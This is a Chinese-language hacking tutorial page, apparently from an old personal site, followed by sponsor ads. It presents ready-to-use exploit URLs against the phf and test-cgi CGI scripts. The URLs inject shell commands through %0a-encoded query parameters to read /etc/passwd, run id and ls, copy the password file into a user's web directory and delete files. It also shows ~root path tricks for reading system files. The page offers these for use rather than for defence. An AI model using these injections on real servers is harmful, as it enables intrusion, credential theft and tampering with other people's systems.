暂时挑选了一些常用的文章上来,更多的将陆续上传

phf攻击

 大家都知道了phf攻击了,phf是cgi script,很多站点都有这个漏洞啦,使用
http://thegnome.com/cgi-bin/phf? Qalias=x% 0a/bin/cat%20/etc/passwd
指令可以拿到那个站点的passwd.但还有些更好的执行方法呦.如:
http://thegnome.com/cgi-bin/phf?%0aid &Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/cgi-bin/phf?% 0als% 20-la%20% 7Esomeuser&Qalias=& Qname=haqr & Qemail=&
Qnickname=& Qoffice_phone=
http://thegnome.com/cgi-bin/phf?% 0acp% 20/etc/passwd%20% 7Esomeuser/passwd% 0A&Qalias=& Qname=
haqr &Qemail=& Qnickname=&Qoffice_phone=
http://thegnome.com/~someuser/passwd
http://thegnome.com/cgi-bin/phf?% 0arm% 20% 7Esomeuser/passwd & Qalias= & Qname=haqr & Qemail= &
Qnickname=& Qoffice_phone=
上面执行的命令是id
ls -la ~someuser
cp /etc/passwd ~someuser/passwd
rm ~someuser/passwd
有关test攻击
http://thegnome.com/cgi-bin/test-cgi? \whatever
服务器会应答,本服务器的一些情况如:
CGI/1.0 test script report:
argc is 0. argv is.
SERVER_SORTWARE=NCSA/1.4B
SERVER-NAME=thegnome.com
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.0
SERVER_PORT=80
REQUEST_METHOD=GET
HTTP_ACCEPT=text/plain,application/x-html, application/html,text/html,text/x-html
PATH_INFO=
PATH_TRANSLATED=
SCRIPT_NAME=/cgi-bin/test-cgi
QUERY-STRING=whatever
REMOTE_HOST=fifth.column.gov
REMOTE_ADDR=200.200.200.200
REMOTE_USER=
AUTH_TYPE=
CONTENT_TYPE=
CONTENT_LENGTH=
好吧,让我们来点感兴趣的
http://thegnome.com/cgi-bin/test-cgi? \ help&0a/bin/cat%20/etc/passwd
应用
主要是用在很多的个人主页上的快捷目录的方法,如果我们使用这样的
http://thegnome.com/~root
http://thegnome.com/~root/etc/passwd
不是在任何平台上都通过呦,在BSD Apache 上曾经成功过,当然还可以试试~bin,~etc,~uucp ...注意请不要破坏呀 

  
 

 本来准备做些有关ps的教程的但是因为时间关系作罢!欢迎大家来补充。^-^

 

 

 

 

 

 

 

 

 

 
本站的地址:voguetoday.126.com

建议最低分辨率800x600

有什么意见和好的建议欢迎提出并给我留言或者发到我的信箱:

xiaottyy@163.com

 

Psend kept free because of these great sponsors.a..

Other Sponsors

electrical connectors, Mangosteen Juice, real estate short sale, Jupiter FL real estate,

Furniture Markdown

Great Deals on furniture - Free Shipping!
Discount Furniture
Daybeds
Metal Beds
Platform Beds
Futons

Y-Net Wireless Internet

Denver area high speed wireless privider.
Colorado High Speed Internet, Wireless Internet Denver, VOIP Denver CO, T1 provider Denver, Denver Wireless ISP , Denver Internet Access,

Dog House Technologies

Doghouse Techonologies is located in Tampa Bay FL and offer professional web design, ecommerce development and custom application design for the internet.
Tampa Bay Web Design, E-Commerce Web Design, Tampa Bay Search Engine Marketing, Tampa Web Hosting, Florida Web Design, Custom Application Development, Search Engine Optimization,

/hosting.asp">Tampa Web Hosting and Florida Web Design This site hosted curtosy of Psend.com's Free Web Hosting. Psend is a division of Telos Online, Inc. Psend kept free because of these great sponsors.a..

Other Sponsors

electrical connectors, Mangosteen Juice, real estate short sale, Jupiter FL real estate,

Furniture Markdown

Great Deals on furniture - Free Shipping!
Discount Furniture
Daybeds
Metal Beds
Platform Beds
Futons

Y-Net Wireless Internet

Denver area high speed wireless privider.
Colorado High Speed Internet, Wireless Internet Denver, VOIP Denver CO, T1 provider Denver, Denver Wireless ISP , Denver Internet Access,

Dog House Technologies

Doghouse Techonologies is located in Tampa Bay FL and offer professional web design, ecommerce development and custom application design for the internet.
Tampa Bay Web Design, E-Commerce Web Design, Tampa Bay Search Engine Marketing, Tampa Web Hosting, Florida Web Design, Custom Application Development, Search Engine Optimization,